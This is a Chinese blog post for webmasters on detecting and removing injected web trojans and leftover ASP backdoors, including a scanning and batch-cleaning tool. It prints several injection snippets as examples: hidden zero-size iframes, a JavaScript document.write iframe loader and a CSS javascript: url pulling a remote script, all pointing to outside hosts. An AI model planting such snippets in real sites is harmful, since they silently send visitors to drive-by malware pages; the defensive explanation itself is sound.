本文中用到的工具下载地址,请前往百度查询
现在网上每天都有成百上千的网站被入侵!而被入侵的站很大一部分人还是很善
良的纯粹的为了学习下技术,进去后帮你把漏洞堵上就退出来了,最多在那留个
后门!所以那些个”黑客”们还是好的!但是其中不乏坏分子会做一些不道德的
事情比如删除你的网站数据啊,修改首页装B啊什么的,但是做的最多的还是挂马
!所以网站被挂马这个问题已经成为大多数站长最头痛的问题,自己熬了N个通宵
,花费了N多精力的站被别人挂马然后流量直线下降,搜索引擎权重降低等等损失
让自己对那些人痛恨不已!但是如果发现及时把马清理掉,把那些黑客留下的后
门清除掉把漏洞堵上的话就应该对网站影响不大!但是很多站长要问怎么知道自
己的站被挂马,怎么去及时的把挂的马给清除呢?接下来我就分两个部分来告诉
大家怎么去分辨自己的站是否被挂马和怎么清理那些“黑客”留下的后门和快速
的清理那些挂马代码!
第一怎么分辨自己的站是否被挂马:
其实我们现在说的所谓的挂马一般就是在那些可编辑文件下或是头加部入一段代
码来实现跳转到别的网站访问那个他们指定的HTML网页木马的然后通过你电脑本
身的漏洞攻破你的系统给你下载一个下载者,然后那下载者设定多少时间后开始
在指定地点隐藏下载木马并运行!所以说我们只要把那段代码给清理掉了就达到
了清理挂马的作用了!所以我们首先要辨别是不是自己的站是不是被挂马!你如
果打开网站发现很卡但是杀毒软件没报警别以为没事了,很多马很有可能做了免
杀处理所以杀软没反映!我们打开网站点查看源代码如果顶部或是底下出现了这
样的代码就恭喜你种标了!比如:<iframe
src=http: //www.yourmyhe width=0 height=0></iframe> 我想学做
站的人都知道这行代码的意思吧?就是插入一个长和高都是0框架运行
http: //www.leyoucx.com这个页面!但是因为框架的长和高都是零你就
没办法看到那个窗口了!但是如果你没在顶部和底部发现这些代码就以为没事了
,有的人还会在中间插入,只是在底部和顶部绝对不会影响到网站的整体结构不
用想那么多!但是如果那个挂马的哥们稍微耐心一点多测试一下在网站代码的中
间还是很容易的!所以如果你代码太多嫌找着麻烦的话你就可以直接在IE浏览器
里点查看--隐私里看到底有没有外连到别的站上去的站!有的话那很有可能被挂
马了!(PS:如果你的站采集了的别人的图片的话在隐私里会有连到别人那的哦
,或是统计代码也是,所以这要自己分析,哪些是正常的,哪些不是)!有的童
鞋可能会说你这人真苯怎么不知道在源文件里直接查找<iframe这个呢!这样快多
了,但是我想说的是不是所有人都是用插入框架的方法挂马的,方法可是有很多
的哦,我就给大家列举一下比如:
1 js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0'
src='http //www.leyoucx.com/ma.htm'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
2css中挂马
body {
background-image: url('javascript:document.write("<script
src=http: //www.leyoucx.com/muma.js></script>")')}
还有很多方法我就不举例了!大家去搜索一下就知道了!如果发现了被挂马了怎
么办呢?那当然是清理了!接下来小弟就教大家怎么清理这些木马!
二清理木马和后门
在这里我们要用到一个工具,其实那些个“黑客”入侵了你们后一般就是用一个
ASP或是PHP马来控制你整个网站来实现挂马,删除数据,改首页等功能!其实也
就是所谓的后门!现在我们也用这个强大工具来破那些后门:首先我们把这个ASP
后门工具传到自己网站的跟目录下!然后访问这个文件,然后输入密码,就进去
了,这就是黑客最常用的后门!我们接下来看怎么操作清马,如果就是主页被改
了的话那还好说,我们直接连接FTP在主页文件改一下就OK了!但是有很多恶心的
人是整站挂马所有的HTML,ASP,PHP,ASPX,TXT,HTM等只要能插入的文件都插
入了代码!所以我们在FTP那一个个改文件不现实了所以要用到这工具!但是清理
马前我们要先清理下那些黑客留下的后门!我们先点查找文件—木马,
然后在旁边路径上填写“/”表示网站跟目录
然后点开始扫描!
如果有红色的文件,说被加密了的!这就基本确定是黑客留下的后门了!但是为
了保险起见我们点进去编辑看一下!如果看到不是普通的网页文件那就肯定是后
门了,我们就可以删除了,但是切记我们这也是后门别把自己用的这个文件也删
除了,那等下又要传了!
他识别黑客后门的原理就是在他的通过扫描ASP文件通过几个特征码来定位他是不
是后门的!比如你现在这个ASP文件里有个1这个数字!而大多数的ASP后门需要实
现这控制网站的功能就必须写1,所以只要这个工具扫描的ASP文件里有这个1的他
都给识别成后门!当然这里的这个1是一个代表,代表的是普通ASP文件用不到但
是ASP后门经常用的一段代码!其实这跟杀软定位你这个文件是不是病毒是一样的
!所以有些后门就写的很简洁逃过了特征码这一段!这怎么办呢?如果你查找到
一两个后门但是你还不放心这时候我们就要看那个创建时间和修改时间那一项了
!我们可以通过时间来查找,繁是在那段时间创建或是修改过的文件全查一次,
看了不是网页文件的就删除!如果说他在那搞了个全站挂马的话那他的所有文件
都动过了,那就只能还原或是一个个翻找ASP文件!好了清理后门就说到这了!
然后接下来我们就来清理木马:
我们找到挂的代码,比如:<iframe src=http: //www.leyoucx.com/muma.html
width=0 height=0></iframe>然后点批量清马,然后在
文件路径里把那个点点去了哦,看清楚那有个点点,不去掉就只清理你这个ASP文
件所在的这个目录!然后不排除任何文件,文件类型你想加什么可以加,不过那
默认的那些都是最常用的文件后缀!然后把要清的马放到那里面,然后点开始执
行!
过一会你就看到文件清理完毕了!那你快去看你的站上是不是没有木马了呢
?这时候你别以为没事了,这些可都是治标不治本的方法,他能入侵你第一次就
能入侵第二次!所以你首先要做的就是堵漏洞!漏洞有很多,所以现在不一一说
明了!我以前写过一篇关于怎么防范网站被入侵的文章的!《菜鸟站长谈个人网
站怎么防黑》
欢迎大家一起交流学习!本人菜鸟高手飞过!
本文来源于心动冒险岛(www.leyoucx.com),如需转载[心动冒险岛私服独家发布网站防黑小心得],请写明出处
上一篇:独家发布,爱心早餐,让你的孩子早餐天天不重复